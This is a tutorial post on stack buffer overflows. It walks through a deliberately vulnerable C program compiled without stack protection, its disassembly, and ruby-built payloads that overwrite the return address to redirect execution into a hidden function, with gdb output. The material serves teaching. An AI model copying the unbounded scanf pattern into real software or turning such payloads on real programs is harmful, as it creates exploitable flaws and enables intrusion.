Marcelo Domínguez

Posted on Feb 17

Buffer Overflow: From Basics to Exploitation

Introduction

This article provides a hands-on guide to exploiting a buffer overflow, one of the most well-known and impactful software vulnerabilities. You'll learn how an attacker can manipulate a program's memory to execute arbitrary code, bypassing its intended behavior. By the end, you'll understand the mechanics behind buffer overflows and how they can lead to serious security risks.

Prerequisites

To follow along, you should have:

A basic understanding of C programming, including pointers and memory management.
Familiarity with the Linux command line and tools such as gcc and gdb.
A general understanding of computer architecture, specifically the stack and how functions are called.

Although the code used for this demonstration is not inherently dangerous, it is best to perform the exploitation in a controlled environment. That way, we’ll be ready when things get more interesting.

What is a Buffer Overflow?

A buffer overflow is a vulnerability in software that occurs when a program writes more data to a fixed-length block of memory (a buffer) than it is designed to hold. This can cause unintended behavior, including crashes, data corruption, or even exploitation by attackers to gain control of the system.

On the stack, a function's local buffers sit next to its saved return address, so an overflow can overwrite that address. An attacker who controls the overflowing data can then redirect execution to a location of their choice, such as injected code or a ‘secret’ function.
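To make "adjacent memory being overwritten" concrete, here is a minimal sketch that models the situation safely. The struct frame_model type and both helper functions are hypothetical names invented for this illustration; they stand in for a real stack frame, so nothing is actually corrupted.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

/* Hypothetical stand-in for a stack frame: an 8-byte buffer followed
 * directly by 8 bytes of neighbouring data. */
struct frame_model {
    unsigned char buffer[8];
    unsigned char neighbour[8];
};

/* Check at compile time that the two members really are adjacent. */
_Static_assert(offsetof(struct frame_model, neighbour) == 8,
               "neighbour must start right after buffer");
_Static_assert(sizeof(struct frame_model) == 16, "no trailing padding expected");

/* Copy len bytes to the start of the model, the way an unchecked copy
 * into `buffer` would. Writing through a pointer to the whole struct
 * keeps the demo well defined as long as len fits inside the struct. */
static void unchecked_copy(struct frame_model *f, const void *src, size_t len) {
    assert(len <= sizeof *f);
    memcpy(f, src, len);
}

/* Count how many bytes of `neighbour` no longer hold their initial value. */
static size_t clobbered_bytes(const struct frame_model *f, unsigned char initial) {
    size_t n = 0;
    for (size_t i = 0; i < sizeof f->neighbour; i++) {
        if (f->neighbour[i] != initial) {
            n++;
        }
    }
    return n;
}
```

Copying 8 bytes leaves neighbour untouched, while copying 12 bytes spills the last 4 into it. In a real frame, those neighbouring bytes would be the saved rbp and the return address.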

Stack Memory Layout and Function Calls

To understand how a buffer overflow can be exploited, we need to examine how the stack changes when a function is called.

Function Prologue

When a function is called, the following steps occur:

The call instruction pushes the return address (where execution should continue after the function ends) onto the stack.
The caller's base pointer (rbp) is pushed onto the stack to preserve the caller's stack frame, and rbp is then set to the current stack pointer.
The stack pointer (rsp) is decreased to allocate space for local variables.

For example, when calling the echo() function in our vulnerable program, the stack initially looks like this:

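| Local Buffer (32 bytes)  |  <-  %rsp (lower addresses)
| Saved %rbp (from main)   |  <-  %rbp
| Return Address (to main) |  <-  loaded into %rip by ret (higher addresses)

Note that buffer is declared as 20 bytes, but the compiler reserves 32 bytes (sub $0x20, %rsp) so that the stack stays 16-byte aligned.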

Understanding Key Registers

To fully grasp how buffer overflows work, let's review the key registers involved:

rbp (Base Pointer): Holds the base address of the current function's stack frame. Used to access function parameters and local variables.
rsp (Stack Pointer): Points to the top of the stack. The stack grows toward lower addresses, so rsp decreases as new data is pushed.
rip (Instruction Pointer): Holds the address of the next instruction to be executed. It cannot be written directly, but ret loads it from the stack, so overwriting the saved return address allows an attacker to redirect execution.

Function Epilogue

When the function ends:

The stack pointer (rsp) is reset to the base pointer, which discards the local variables.
The caller's base pointer (rbp) is restored from the stack.
The ret instruction pops the stored return address into rip, and execution resumes there.

If an attacker overwrites the return address, they can control where execution continues.
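The prologue and epilogue steps can be sketched as a toy model. Everything here (struct cpu_model, the slot-based stack, the function names) is a hypothetical simplification for illustration, not how a real CPU or debugger represents state. It shows that ret loads whatever value sits in the return-address slot, whether or not call put it there.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

#define STACK_SLOTS 16

/* Toy machine state. One slot models 8 bytes; index 0 is the lowest address. */
struct cpu_model {
    uint64_t stack[STACK_SLOTS];
    size_t rsp;   /* index of the current top-of-stack slot */
    size_t rbp;   /* index of the slot holding the saved rbp */
    uint64_t rip; /* address of the next instruction */
};

static void push(struct cpu_model *c, uint64_t value) {
    assert(c->rsp > 0);
    c->stack[--c->rsp] = value; /* the stack grows toward lower addresses */
}

static uint64_t pop(struct cpu_model *c) {
    assert(c->rsp < STACK_SLOTS);
    return c->stack[c->rsp++];
}

/* call + prologue */
static void enter_function(struct cpu_model *c, uint64_t return_address,
                           size_t local_slots) {
    push(c, return_address);  /* call: push the return address */
    push(c, c->rbp);          /* push %rbp */
    c->rbp = c->rsp;          /* mov %rsp,%rbp */
    assert(c->rsp >= local_slots);
    c->rsp -= local_slots;    /* sub $N,%rsp */
}

/* epilogue: leave; ret */
static void leave_function(struct cpu_model *c) {
    c->rsp = c->rbp;          /* leave, part 1: mov %rbp,%rsp */
    c->rbp = (size_t)pop(c);  /* leave, part 2: pop %rbp */
    c->rip = pop(c);          /* ret: pop the return address into rip */
}
```

With 4 local slots, the saved rbp sits at stack[rsp + 4] and the return address at stack[rsp + 5] after enter_function. Writing a different value into that last slot before calling leave_function changes where the model "returns" to.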

Exploitation

Vulnerable code

#include <stdio.h>

void secret() {
    printf("Oops, you weren't supposed to see this 0_0!\n");
}

void echo() {
    char buffer[20];

    printf("What's your name?\n");
    scanf("%s", buffer);  // no field width: input longer than 19 characters overflows buffer
    printf("Hello, %s!\n", buffer);
}

int main(int argc, char* argv[]) {
    echo();
    return 0;
}
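For contrast only, here is a minimal sketch of a bounded read. It is not part of the program exploited in this article. The helper name read_name is hypothetical, and it reads a whole line with fgets rather than a single word, so its behavior is not identical to scanf("%s"). A width-limited scanf("%19s", buffer) would be the closer drop-in change.

```c
#include <assert.h>
#include <stdio.h>
#include <string.h>

/* Read one line into buf without ever writing more than cap bytes,
 * terminator included. Returns 1 on success, 0 on end of input or error. */
static int read_name(FILE *in, char *buf, size_t cap) {
    assert(in != NULL && buf != NULL && cap > 0);
    if (fgets(buf, (int)cap, in) == NULL) {
        return 0;
    }
    buf[strcspn(buf, "\n")] = '\0'; /* strip the trailing newline, if any */
    return 1;
}
```

Calling read_name(stdin, buffer, sizeof buffer) in echo() would truncate long input to 19 characters instead of writing past the end of buffer.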

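Compile the code with the following flags, which give the binary fixed memory addresses and disable stack protection:

-static: links the binary statically; the resulting executable is not position-independent, so function addresses are the same on every run
-fno-stack-protector: disables the stack canary that would otherwise detect the overwritten return address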

all:
	gcc -static -fno-stack-protector vuln.c -o vuln
clean:
	rm -f vuln

To identify the address of the secret function, disassemble the binary using objdump:

objdump -d vuln

The output is long because the binary is statically linked, but we only need the following two functions:

0000000000401905 <secret>:
  401905:       f3 0f 1e fa             endbr64
  401909:       55                      push   %rbp
  40190a:       48 89 e5                mov    %rsp,%rbp
  40190d:       48 8d 05 1c b7 09 00    lea    0x9b71c(%rip),%rax        # 49d030 <__rseq_flags+0x2c>
  401914:       48 89 c7                mov    %rax,%rdi
  401917:       e8 34 1a 01 00          call   413350 <_IO_puts>
  40191c:       90                      nop
  40191d:       5d                      pop    %rbp
  40191e:       c3                      ret

000000000040191f <echo>:
  40191f:       f3 0f 1e fa             endbr64
  401923:       55                      push   %rbp
  401924:       48 89 e5                mov    %rsp,%rbp
  401927:       48 83 ec 20             sub    $0x20,%rsp
  40192b:       48 8d 05 2a b7 09 00    lea    0x9b72a(%rip),%rax        # 49d05c <__rseq_flags+0x58>
  401932:       48 89 c7                mov    %rax,%rdi
  401935:       e8 16 1a 01 00          call   413350 <_IO_puts>
  40193a:       48 8d 45 e0             lea    -0x20(%rbp),%rax
  40193e:       48 89 c6                mov    %rax,%rsi
  401941:       48 8d 05 26 b7 09 00    lea    0x9b726(%rip),%rax        # 49d06e <__rseq_flags+0x6a>
  401948:       48 89 c7                mov    %rax,%rdi
  40194b:       b8 00 00 00 00          mov    $0x0,%eax
  401950:       e8 9b 34 00 00          call   404df0 <__isoc99_scanf>
  401955:       48 8d 45 e0             lea    -0x20(%rbp),%rax
  401959:       48 89 c6                mov    %rax,%rsi
  40195c:       48 8d 05 0e b7 09 00    lea    0x9b70e(%rip),%rax        # 49d071 <__rseq_flags+0x6d>
  401963:       48 89 c7                mov    %rax,%rdi
  401966:       b8 00 00 00 00          mov    $0x0,%eax
  40196b:       e8 50 35 00 00          call   404ec0 <_IO_printf>
  401970:       90                      nop
  401971:       c9                      leave
  401972:       c3                      ret

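At the beginning of the echo function, we can see how the compiler reserves 32 bytes on the stack (sub $0x20,%rsp). The lea -0x20(%rbp),%rax instructions show that buffer starts at the lowest address of that region. The stack therefore looks like this:

| Local Buffer (32 bytes)  |  <-  %rsp (lower addresses)
| Saved %rbp (from main)   |  <-  %rbp
| Return Address (to main) |  <-  loaded into %rip by ret (higher addresses)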

Our C code does not limit how much scanf reads, so what happens if we enter a string longer than the buffer?

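If we enter 20 to 31 characters, nothing visible happens: the input plus its terminating null byte still fits in the 32 bytes reserved below the saved rbp, even though buffer is declared with only 20 bytes. Longer input overwrites the saved rbp, and anything past the 40th byte lands on the return address, so the program crashes with a segmentation fault. Let's inspect it using gdb to find out what is going on. The payload is 40 filler bytes (32 for the reserved region plus 8 for the saved rbp) followed by the 8-byte value 0xcafe in little-endian order. We can create it using, for example, ruby.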

ruby -e 'print "a"*40 + "\xFE\xCA\x00\x00\x00\x00\x00\x00"' > input_data
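The 40 filler bytes follow from the frame layout: buffer starts 0x20 bytes below rbp, and the saved rbp takes 8 more bytes before the return address. The sketch below spells out that arithmetic. The function and enum names are hypothetical, and the 8-byte saved-rbp size assumes x86-64 as in this article.

```c
#include <assert.h>
#include <stddef.h>

#define SAVED_RBP_SIZE 8u /* assumption: x86-64, 8-byte saved base pointer */

enum overwrite_target { INSIDE_FRAME, SAVED_RBP, RETURN_ADDRESS };

/* Number of filler bytes needed before the return address is reached.
 * buffer_to_rbp is the distance from the buffer start to rbp,
 * e.g. 0x20 for `lea -0x20(%rbp),%rax`. */
static size_t padding_to_return_address(size_t buffer_to_rbp) {
    assert(buffer_to_rbp > 0);
    return buffer_to_rbp + SAVED_RBP_SIZE;
}

/* Highest region touched when scanf("%s") stores input_chars characters.
 * scanf appends a terminating '\0', so it writes input_chars + 1 bytes. */
static enum overwrite_target highest_region_written(size_t buffer_to_rbp,
                                                    size_t input_chars) {
    size_t bytes_written = input_chars + 1;
    if (bytes_written <= buffer_to_rbp) {
        return INSIDE_FRAME;
    }
    if (bytes_written <= buffer_to_rbp + SAVED_RBP_SIZE) {
        return SAVED_RBP;
    }
    return RETURN_ADDRESS;
}
```

For this binary, padding_to_return_address(0x20) gives 40, which is the "a"*40 in the payload. Inputs of 32 to 39 characters reach only the saved rbp, and 40 or more reach the return address.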

Now we start a gdb session on our executable (gdb ./vuln) and pass the payload as input:

(gdb) run < input_data
Starting program: /home/user/Desktop/c/buffer_overflow/vuln < input_data
What's your name?
Hello, aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa�

Program received signal SIGSEGV, Segmentation fault.
0x000000000000cafe in ?? ()
(gdb) x $rip
0xcafe: Cannot access memory at address 0xcafe

We can see that the saved return address was overwritten with 0xcafe, and ret loaded it into $rip. Nothing is mapped at that address, so we get a SIGSEGV and nothing interesting happens. But what if we set $rip to a valid address?

From the disassembly of our binary, we know that the address of secret is 0x401905:

0000000000401905 <secret>
    ...

We update the payload, again writing the address in little-endian byte order (least significant byte first):

ruby -e 'print "a"*40 + "\x05\x19\x40\x00\x00\x00\x00\x00"' > input_data
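The byte string "\x05\x19\x40\x00\x00\x00\x00\x00" is the address 0x401905 stored least significant byte first, which is how x86-64 lays out an 8-byte value in memory. As a sketch of the same payload construction in C (build_payload is a hypothetical helper, not something the original workflow uses):

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Write `padding` filler bytes followed by `address` in little-endian
 * order into out. Returns the payload length, or 0 if out is too small. */
static size_t build_payload(unsigned char *out, size_t out_cap,
                            size_t padding, uint64_t address) {
    assert(out != NULL);
    if (padding > out_cap || out_cap - padding < sizeof address) {
        return 0;
    }
    memset(out, 'a', padding);
    for (size_t i = 0; i < sizeof address; i++) {
        /* least significant byte first */
        out[padding + i] = (unsigned char)(address >> (8 * i));
    }
    return padding + sizeof address;
}
```

Calling build_payload(buf, sizeof buf, 40, 0x401905) and writing the result to input_data with fwrite should produce the same 48 bytes as the ruby one-liner. Because scanf("%s") stops at whitespace, this approach only works when none of the address bytes is a whitespace character, which holds for 0x05, 0x19 and 0x40.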

As before, we execute the binary and pass the payload as input:

(gdb) run < input_data
Starting program: /home/user/Desktop/c/buffer_overflow/vuln < input_data
Downloading separate debug info for system-supplied DSO at 0x7ffff7ffd000
What's your name?
Hello, aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa@!
Oops, you weren't supposed to see this 0_0!

Program received signal SIGSEGV, Segmentation fault.
0x00007fffffffe000 in ?? ()

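We still get a SIGSEGV, but this time the secret function runs first. The crash happens afterwards because secret's own ret pops the next value off the stack, which is not a valid return address.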
